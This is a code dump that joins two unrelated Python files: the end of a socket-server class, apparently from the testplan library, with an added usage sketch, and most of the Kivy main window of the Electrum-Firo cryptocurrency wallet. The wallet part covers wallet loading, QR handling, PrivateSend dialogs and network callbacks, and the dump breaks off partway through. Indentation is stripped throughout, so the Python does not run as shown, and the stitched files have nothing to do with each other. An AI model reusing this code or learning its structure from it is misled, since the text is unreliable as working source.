def _remove_all_connections(self):
"""
Unregister, close and remove all existing connections
:return: ``None``
:rtype: ``NoneType``
"""
for fdesc in self._connection_by_fd:
self._connection_by_fd[fdesc].close()
self._connection_by_fd = {}
self._fds = {}
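# Hedged usage sketch (an addition, not part of the testplan module): bind a server
# on an ephemeral port, connect a plain client socket from the standard library,
# accept the connection and exchange one message in each direction.
if __name__ == '__main__':
    server = Server(host='localhost', port=0)
    server.bind()
    server.serve()
    client = socket.create_connection((server.ip, server.port))
    conn_idx = server.accept_connection(timeout=5)
    client.sendall(b'ping')
    print(server.receive(size=4, conn_idx=conn_idx))  # b'ping'
    server.send(b'pong', conn_idx=conn_idx)
    print(client.recv(4))  # b'pong'
    client.close()
    server.close()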
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum_firo.dash_ps_util import (PSPossibleDoubleSpendError,
PSSpendToPSAddressesError)
from electrum_firo.storage import WalletStorage, StorageReadWriteError
from electrum_firo.wallet_db import WalletDB
from electrum_firo.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum_firo.wallet import update_password_for_directory
from electrum_firo.plugin import run_hook
from electrum_firo import util
from electrum_firo.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis)
from electrum_firo.invoices import PR_PAID, PR_FAILED
from electrum_firo import blockchain
from electrum_firo.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_firo.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum_firo.logging import Logger
from electrum_firo.gui import messages
from .i18n import _
from . import KIVY_GUI_PATH
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog, PasswordDialog
from .uix.dialogs.choice_dialog import ChoiceDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_firo.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_firo.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_firo.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_firo.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
from .uix.dialogs.dash_kivy import TorWarnDialog
from .uix.dialogs.warn_dialog import WarnDialog
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# Register the widget cache for keeping memory down; the timeout is set so the
# data is cached forever.
Cache.register('electrum_firo_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_firo.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register(
'Roboto',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
)
from electrum_firo.util import (NoDynamicFeeEstimates, NotEnoughFunds,
FIRO_BIP21_URI_SCHEME, PAY_BIP21_URI_SCHEME,
UserFacingException)
if TYPE_CHECKING:
from . import ElectrumGui
from electrum_firo.simple_config import SimpleConfig
from electrum_firo.plugin import Plugins
from electrum_firo.paymentrequest import PaymentRequest
ATLAS_ICON = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/%s'
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
tor_auto_on_bp = BooleanProperty()
def toggle_tor_auto_on(self, x):
self.tor_auto_on_bp = not self.electrum_config.get('tor_auto_on', True)
self.electrum_config.set_key('tor_auto_on', self.tor_auto_on_bp, True)
fiat_bypass_tor_bp = BooleanProperty()
def toggle_fiat_bypass_tor(self, x):
self.fiat_bypass_tor_bp = \
not self.electrum_config.get('fiat_bypass_tor', False)
self.electrum_config.set_key('fiat_bypass_tor',
self.fiat_bypass_tor_bp, True)
coro = self.network.restart()
self.network.run_from_another_thread(coro)
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def switch_to_send_screen(func):
# try until send_screen is available
def wrapper(self, *args):
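            # Poll every 0.1s: wait for the wallet, keep switching to the send tab
            # until send_screen exists, then run func once and return False so the
            # scheduled interval stops.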
f = lambda dt: (bool(func(self, *args) and False) if self.send_screen else bool(self.switch_to('send') or True)) if self.wallet else True
Clock.schedule_interval(f, 0.1)
return wrapper
@switch_to_send_screen
def set_URI(self, uri):
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
data = str(intent.getDataString())
scheme = str(intent.getScheme()).lower()
if scheme in [FIRO_BIP21_URI_SCHEME, PAY_BIP21_URI_SCHEME]:
self.set_URI(data)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
req = self.wallet.receive_requests.get(key)
if req is None:
return
if self.receive_screen:
if status == PR_PAID:
self.receive_screen.update()
else:
self.receive_screen.update_item(key, req)
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
if self.send_screen:
if status == PR_PAID:
self.send_screen.update()
else:
self.send_screen.update_item(key, req)
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''The current screen orientation, derived from the window size.
    Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
    '''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
    '''
def __init__(self, **kwargs):
self.is_android = ('ANDROID_DATA' in os.environ)
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
self._use_single_password = False
self.resume_dialog = None
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
self.tor_auto_on_bp = self.electrum_config.get('tor_auto_on', True)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_unconfirmed = not config.get('confirmed_only', False)
        # create triggers so that updates happen at most twice per second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._trigger_update_readiness = Clock.create_trigger(self.update_readiness, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._plugins_dialog = None
self._settings_dialog = None
self._dash_net_dialog = None
self._addresses_dialog = None
self.set_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data: str):
from electrum_firo.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
data_l = data.lower()
if (data_l.startswith(FIRO_BIP21_URI_SCHEME + ':')
or data_l.startswith(PAY_BIP21_URI_SCHEME + ':')):
self.set_URI(data)
return
# try to decode transaction
from electrum_firo.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for name in ['send', 'history', 'receive']:
self.update_tab(name)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def run_other_app(self, app_name):
if not self.is_android:
            return f'Cannot start {app_name}: not an Android system'
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
Intent = autoclass('android.content.Intent')
pm = autoclass('android.content.pm.PackageManager')
activity = PythonActivity.mActivity
pm_ = activity.getPackageManager()
array_pkg = pm_.getInstalledApplications(pm.GET_META_DATA).toArray()
selected_pkg = []
for i in array_pkg:
if "/data/app/" not in getattr(i, "publicSourceDir"):
continue
selected_pkg.append(i)
app_to_launch = app_name
found = False
for i in selected_pkg:
if app_to_launch == getattr(i, "packageName"):
found = True
try:
package_name = getattr(i, "packageName")
app_intent = pm_.getLaunchIntentForPackage(package_name)
app_intent.setAction(Intent.ACTION_VIEW)
app_intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
activity.startActivity(app_intent)
def _run_task(activity, app_intent):
time.sleep(0.25)
activity.startActivity(app_intent)
args = (activity, app_intent)
threading.Thread(target=_run_task, args=args).start()
except Exception as e:
                    return f'Error on launching {app_name}: {str(e)}'
if not found:
return f'App {app_name} not found'
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return self.scan_qr_non_android(on_complete)
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.dash.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def scan_qr_non_android(self, on_complete):
from electrum_firo import qrscanner
try:
video_dev = self.electrum_config.get_video_device()
data = qrscanner.scan_barcode(video_dev)
if data is not None:
on_complete(data)
except UserFacingException as e:
self.show_error(e)
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file(KIVY_GUI_PATH + '/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for dash: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified',
'verified-islock', 'excessive-resource-usage']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_mn_list_updated,
['mn-list-diff-updated',
'mn-list-info-updated'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_success(self, storage, db, password):
self.password = password
if self.electrum_config.get('single_password'):
self._use_single_password = update_password_for_directory(self.electrum_config, password, password)
self.logger.info(f'use single password: {self._use_single_password}')
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.show_backup_msg()
def show_backup_msg(self):
w = self.wallet
if w and getattr(w.storage, 'backup_message', None):
WarnDialog(w.storage.backup_message, title=_('Information')).open()
w.storage.backup_message = ''
def on_wizard_aborted(self):
# wizard did not return a wallet; and there is no wallet open atm
if not self.wallet:
self.stop()
def load_wallet_by_name(self, path):
def continue_load():
self._load_wallet_by_name(path)
if (self.electrum_config.get('tor_auto_on', True)
and not self.network.detect_tor_proxy()):
TorWarnDialog(self, path, continue_load).open()
else:
continue_load()
def _load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
if self.password and self._use_single_password:
storage = WalletStorage(path)
# call check_password to decrypt
storage.check_password(self.password)
self.on_open_wallet(self.password, storage)
return
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
def on_open_wallet(self, password, storage):
if not storage.file_exists():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.run('new')
else:
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
assert not db.requires_upgrade()
if db.upgrade_done:
storage.backup_old_version()
if db.check_unfinished_multisig():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.continue_multisig_setup(storage)
else:
self.on_wizard_success(storage, db, password)
def on_stop(self):
self.logger.info('on_stop')
self.history_screen.stop_get_data_thread()
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
util.unregister_callback(self.on_ps_callback)
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
if key == 27 and self.is_exit:
if self.wallet:
psman = self.wallet.psman
is_mixing = (psman.state in psman.mixing_running_states)
is_waiting = psman.is_waiting if is_mixing else False
if is_mixing and not is_waiting:
def on_want_exit(b):
if b:
from kivy.base import stopTouchApp
stopTouchApp()
d = Question(psman.WAIT_MIXING_STOP_MSG, on_want_exit)
d.open()
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
else:
self._settings_dialog.update()
self._settings_dialog.open()
def is_wallet_creation_disabled(self):
return bool(self.electrum_config.get('single_password')) and self.password is None
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled())
d.open()
def plugins_dialog(self):
from .uix.dialogs.plugins import PluginsDialog
if self._plugins_dialog is None:
self._plugins_dialog = PluginsDialog(self)
self._plugins_dialog.update()
self._plugins_dialog.open()
def dash_net_dialog(self):
from .uix.dialogs.dash_net import DashNetDialog
if self._dash_net_dialog is None:
self._dash_net_dialog = DashNetDialog(self)
self._dash_net_dialog.update()
self._dash_net_dialog.open()
def privatesend_dialog(self):
if self.wallet.psman.unsupported:
from .uix.dialogs.privatesend import PSDialogUnsupportedPS as psdlg
else:
from .uix.dialogs.privatesend import PSDialog as psdlg
psdlg(self).open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'plugins':
self.plugins_dialog()
elif name == 'dash_net':
self.dash_net_dialog()
elif name == 'privatesend':
self.privatesend_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
popup.open()
@profiler
def init_ui(self):
        '''Initialize the UX part of Electrum. This function performs the basic
        tasks of setting up the UI.
        '''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_firo.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_firo.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_firo_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_firo_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.send_screen = None
self.receive_screen = None
if self.testnet:
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum-dash-testnet.png"
else:
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum-dash.png"
self.root.ids.ps_button.icon = self.ps_icon()
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
self._trigger_update_readiness()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
self._trigger_update_readiness()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
wallet, tx = args
if wallet.psman.need_notify(tx.txid()):
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
elif event == 'verified-islock':
self._trigger_update_wallet()
elif event == 'excessive-resource-usage':
self.show_info(args[0])
def on_ps_callback(self, event, *args):
Clock.schedule_once(lambda dt: self.on_ps_event(event, *args))
def on_ps_event(self, event, *args):
psman = self.wallet.psman
is_mixing = (psman.state in psman.mixing_running_states)
is_waiting = psman.is_waiting if is_mixing else False
if event == 'ps-data-changes':
wallet = args[0]
if wallet == self.wallet:
self._trigger_update_wallet()
if event == 'ps-reserved-changes':
wallet = args[0]
if wallet == self.wallet:
self._trigger_update_wallet()
elif event in ['ps-state-changes', 'ps-wfl-changes',
'ps-keypairs-changes']:
wallet, msg, msg_type = (*args, None, None)[:3]
if wallet == self.wallet:
self.update_ps_btn(is_mixing, is_waiting)
if msg:
if msg_type and msg_type.startswith('inf'):
self.show_info(msg)
else:
WarnDialog(msg, title=_('PrivateSend')).open()
elif event == 'ps-not-enough-sm-denoms':
wallet, denoms_by_vals = args
if wallet == self.wallet:
q = psman.create_sm_denoms_data(confirm_txt=True)
def create_small_denoms(confirmed):
if confirmed:
self.create_small_denoms(denoms_by_vals)
d = Question(q, create_small_denoms)
d.open()
elif event == 'ps-other-coins-arrived':
wallet, txid = args
if wallet == self.wallet:
q = '\n\n'.join([psman.OTHER_COINS_ARRIVED_MSG1.format(txid),
psman.OTHER_COINS_ARRIVED_MSG2,
psman.OTHER_COINS_ARRIVED_MSG3,
psman.OTHER_COINS_ARRIVED_MSG4,
psman.OTHER_COINS_ARRIVED_Q])
def show_coins_dialog(confirmed):
if confirmed:
self.coins_dialog(1)
d = Question(q, show_coins_dialog)
d.open()
def create_small_denoms(self, denoms_by_vals):
w = self.wallet
psman = w.psman
coins = psman.get_biggest_denoms_by_min_round()
if not coins:
msg = psman.create_sm_denoms_data(no_denoms_txt=True)
self.show_error(msg)
            return
        self.create_new_denoms(coins[0:1])
def create_new_denoms(self, coins):
def on_q_answered(confirmed):
if confirmed:
self.protected(_('Enter your PIN code to sign'
' new denoms transactions'),
self._create_new_denoms, (coins,))
w = self.wallet
psman = w.psman
info = psman.new_denoms_from_coins_info(coins)
q = _('Do you want to create transactions?\n\n{}').format(info)
d = Question(q, on_q_answered)
d.open()
def _create_new_denoms(self, coins, password):
w = self.wallet
psman = w.psman
wfl, err = psman.create_new_denoms_wfl_from_gui(coins, password)
if err:
self.show_error(err)
else:
self.show_info(f'Created New Denoms workflow with'
f' txids: {", ".join(wfl.tx_order)}')
def create_new_collateral(self, coins):
def on_q_answered(confirmed):
if confirmed:
self.protected(_('Enter your PIN code to sign'
' new collateral transactions'),
self._create_new_collateral, (coins,))
w = self.wallet
psman = w.psman
info = psman.new_collateral_from_coins_info(coins)
q = _('Do you want to create transactions?\n\n{}').format(info)
d = Question(q, on_q_answered)
d.open()
def _create_new_collateral(self, coins, password):
w = self.wallet
psman = w.psman
wfl, err = psman.create_new_collateral_wfl_from_gui(coins, password)
if err:
self.show_error(err)
else:
self.show_info(f'Created New Collateral workflow with'
f' txids: {", ".join(wfl.tx_order)}')
def update_ps_btn(self, is_mixing, is_waiting):
ps_button = self.root.ids.ps_button
ps_button.icon = self.ps_icon(active=is_mixing, is_waiting=is_waiting)
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
util.register_callback(self.on_ps_callback,
['ps-data-changes',
'ps-reserved-changes',
